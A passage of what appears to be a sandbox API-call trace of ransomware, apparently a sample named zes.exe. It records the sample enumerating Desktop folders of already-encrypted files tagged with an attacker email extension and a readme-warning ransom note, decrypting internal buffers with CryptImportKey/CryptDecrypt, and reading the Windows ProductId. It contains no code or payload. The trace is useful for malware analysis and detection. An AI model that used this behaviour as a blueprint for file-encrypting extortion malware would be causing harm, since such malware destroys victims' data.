ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce941450, ftCreationTime.dwHighDateTime=0x1d5e4cc, ftLastAccessTime.dwLowDateTime=0x60ddc7e0, ftLastAccessTime.dwHighDateTime=0x1d5e1e7, ftLastWriteTime.dwLowDateTime=0xa7bdf1f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x16d84, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ga 79jQ.csv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="GA79JQ~1.ZES")) returned 1 [0150.029] GetProcessHeap () returned 0x520000 [0150.029] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x284) returned 0x3f1b378 [0150.029] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ecb6270, ftCreationTime.dwHighDateTime=0x1d5dc92, ftLastAccessTime.dwLowDateTime=0x10647020, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0xa7bdf1f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1b44, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qfzGN 6xma8CCH8IKS.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="QFZGN6~1.ZES")) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7dce3d0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sGnbgw8s2gTrD4", cAlternateFileName="SGNBGW~1")) returned 1 [0150.029] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.029] GetProcessHeap () returned 0x520000 [0150.029] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x3eea128 [0150.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\*.*", lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f43608 [0150.029] GetProcessHeap () returned 0x520000 [0150.029] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3eea128 | out: hHeap=0x520000) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9c720, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x567cfe70, ftLastAccessTime.dwHighDateTime=0x1d5d99e, ftLastWriteTime.dwLowDateTime=0xa7c05350, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe164, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="6R1trGA_1jq.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="6R1TRG~1.ZES")) returned 1 [0150.029] GetProcessHeap () returned 0x520000 [0150.029] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2a2) returned 0x553158 [0150.029] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827035a0, ftCreationTime.dwHighDateTime=0x1d5e25f, ftLastAccessTime.dwLowDateTime=0x1e9314b0, ftLastAccessTime.dwHighDateTime=0x1d5dfc3, ftLastWriteTime.dwLowDateTime=0xa7c2b4b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17ea4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mGYbl5LMqWWKr.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MGYBL5~1.ZES")) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74680640, ftCreationTime.dwHighDateTime=0x1d5e1f1, ftLastAccessTime.dwLowDateTime=0x4e982130, ftLastAccessTime.dwHighDateTime=0x1d5dabb, ftLastWriteTime.dwLowDateTime=0xa7c51610, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x14dc4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mnJKsprR.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MNJKSP~1.ZES")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb2cc90, ftCreationTime.dwHighDateTime=0x1d5dac6, ftLastAccessTime.dwLowDateTime=0x5d57d390, ftLastAccessTime.dwHighDateTime=0x1d5e557, ftLastWriteTime.dwLowDateTime=0xa7c51610, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6294, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="NglnlXvJLQ haes0xIg.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="NGLNLX~1.ZES")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ohRy5R3Zh", cAlternateFileName="OHRY5R~1")) returned 1 [0150.030] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.030] GetProcessHeap () returned 0x520000 [0150.030] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb4) returned 0x619e88 [0150.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\*.*", lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f43648 [0150.030] GetProcessHeap () returned 0x520000 [0150.030] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x619e88 | out: hHeap=0x520000) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c042b00, ftCreationTime.dwHighDateTime=0x1d5d991, ftLastAccessTime.dwLowDateTime=0xb313aa90, ftLastAccessTime.dwHighDateTime=0x1d5d8ad, ftLastWriteTime.dwLowDateTime=0xa7c77770, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x11484, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="C OQSp3lrPEA6lKyBv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="COQSP3~1.ZES")) returned 1 [0150.030] GetProcessHeap () returned 0x520000 [0150.030] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2b6) returned 0x553408 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef9710, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0xf96f89d0, ftLastAccessTime.dwHighDateTime=0x1d5deae, ftLastWriteTime.dwLowDateTime=0xa7d0fcf0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="O7GsOEI.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="O7GSOE~1.ZES")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71b17e10, ftCreationTime.dwHighDateTime=0x1d5e4ec, ftLastAccessTime.dwLowDateTime=0xadd86a10, ftLastAccessTime.dwHighDateTime=0x1d5da39, ftLastWriteTime.dwLowDateTime=0xa7d35e50, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xd844, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Pef90osST9zF.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="PEF90O~1.ZES")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d5bfb0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xecf4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zeCGssAJsgRZgGpoHCS.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZECGSS~1.ZES")) returned 1 [0150.030] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xecf4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zeCGssAJsgRZgGpoHCS.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZECGSS~1.ZES")) returned 0 [0150.030] FindClose (in: hFindFile=0x3f43648 | out: hFindFile=0x3f43648) returned 1 [0150.031] GetProcessHeap () returned 0x520000 [0150.031] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553408 | out: hHeap=0x520000) returned 1 [0150.031] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.031] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7da8270, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0e0a90, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x7baf9a20, ftLastAccessTime.dwHighDateTime=0x1d5e70b, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x3754, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="S0OmtXwErpHh0OJ.flv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="S0OMTX~1.ZES")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c12bf0, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0x1f05c1f0, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0xa7d82110, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x18e94, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wS0c4nhKFr.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WS0C4N~1.ZES")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xcfe4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YK9azGU-728BZMlu.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YK9AZG~1.ZES")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xcfe4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YK9azGU-728BZMlu.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YK9AZG~1.ZES")) returned 0 [0150.031] FindClose (in: hFindFile=0x3f43608 | out: hFindFile=0x3f43608) returned 1 [0150.031] GetProcessHeap () returned 0x520000 [0150.031] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553158 | out: hHeap=0x520000) returned 1 [0150.031] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.031] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5de1790, ftCreationTime.dwHighDateTime=0x1d5de38, ftLastAccessTime.dwLowDateTime=0xdbdffdb0, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x76d4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WGs9eIzE7L6We.odt.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WGS9EI~1.ZES")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x4044, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wMPhdEkF8ANxaAg_NJ.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WMPHDE~1.ZES")) returned 1 [0150.031] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x4044, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wMPhdEkF8ANxaAg_NJ.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WMPHDE~1.ZES")) returned 0 [0150.031] FindClose (in: hFindFile=0x3f435c8 | out: hFindFile=0x3f435c8) returned 1 [0150.031] GetProcessHeap () returned 0x520000 [0150.031] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f1b378 | out: hHeap=0x520000) returned 1 [0150.032] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.032] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fb1a60, ftCreationTime.dwHighDateTime=0x1d5de7a, ftLastAccessTime.dwLowDateTime=0x78a29120, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xa7df4530, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17f14, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ybEXHNZftujEdotm.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YBEXHN~1.ZES")) returned 1 [0150.032] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69abf600, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0x6a448c80, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x23529900, ftLastWriteTime.dwHighDateTime=0x1d66ce3, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zes.exe", cAlternateFileName="")) returned 1 [0150.032] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2096e0, ftCreationTime.dwHighDateTime=0x1d5e817, ftLastAccessTime.dwLowDateTime=0xb87a3260, ftLastAccessTime.dwHighDateTime=0x1d5e6db, ftLastWriteTime.dwLowDateTime=0xa7df4530, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x109f4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zgyGh8GT0arDFn7.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZGYGH8~1.ZES")) returned 1 [0150.032] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZJYWQA~1.ZES")) returned 1 [0150.032] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfbb7e70, ftCreationTime.dwHighDateTime=0x1d5e5d1, ftLastAccessTime.dwLowDateTime=0x2ed92ca0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZJyWQae78.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZJYWQA~1.ZES")) returned 0 [0150.032] FindClose (in: hFindFile=0x3f43508 | out: hFindFile=0x3f43508) returned 1 [0150.032] GetProcessHeap () returned 0x520000 [0150.032] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f137c8 | out: hHeap=0x520000) returned 1 Thread: id = 151 os_tid = 0x10c [0153.221] GetProcessHeap () returned 0x520000 [0153.221] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x3eb5890 [0153.221] GetProcessHeap () returned 0x520000 [0153.221] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18210 [0153.221] GetProcessHeap () returned 0x520000 [0153.221] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x5809e0 [0153.221] CryptImportKey (in: hProv=0x534c10, pbData=0x40efed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.221] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5809e0, pdwDataLen=0x40eff3c | out: pbData=0x5809e0, pdwDataLen=0x40eff3c) returned 1 [0153.221] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.221] GetProcessHeap () returned 0x520000 [0153.221] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x57feb8 [0153.222] CryptImportKey (in: hProv=0x534c10, pbData=0x40efed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.222] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x57feb8, pdwDataLen=0x40eff3c | out: pbData=0x57feb8, pdwDataLen=0x40eff3c) returned 1 [0153.222] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.222] SetErrorMode (uMode=0x1) returned 0x1 [0153.222] GetLogicalDrives () returned 0x4 [0153.222] GetProcessHeap () returned 0x520000 [0153.222] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18258 [0153.222] CryptImportKey (in: hProv=0x534c10, pbData=0x40efa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.222] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18258, pdwDataLen=0x40efab8 | out: pbData=0x3f18258, pdwDataLen=0x40efab8) returned 1 [0153.222] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.222] GetProcessHeap () returned 0x520000 [0153.222] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0153.222] CryptImportKey (in: hProv=0x534c10, pbData=0x40efa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.222] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x40efab8 | out: pbData=0x5a1318, pdwDataLen=0x40efab8) returned 1 [0153.222] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.222] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x40efab4 | out: phkResult=0x40efab4*=0x5f4) returned 0x0 [0153.222] RegQueryValueExA (in: hKey=0x5f4, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x40efac0, lpcbData=0x40efabc*=0x400 | out: lpType=0x0, lpData=0x40efac0*=0x30, lpcbData=0x40efabc*=0x18) returned 0x0 [0153.222] RegCloseKey (hKey=0x5f4) returned 0x0 [0153.222] GetProcessHeap () returned 0x520000 [0153.222] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18258 | out: hHeap=0x520000) returned 1 [0153.222] GetProcessHeap () returned 0x520000 [0153.222] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0153.223] GetProcessHeap () returned 0x520000 [0153.223] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0153.223] CryptImportKey (in: hProv=0x534c10, 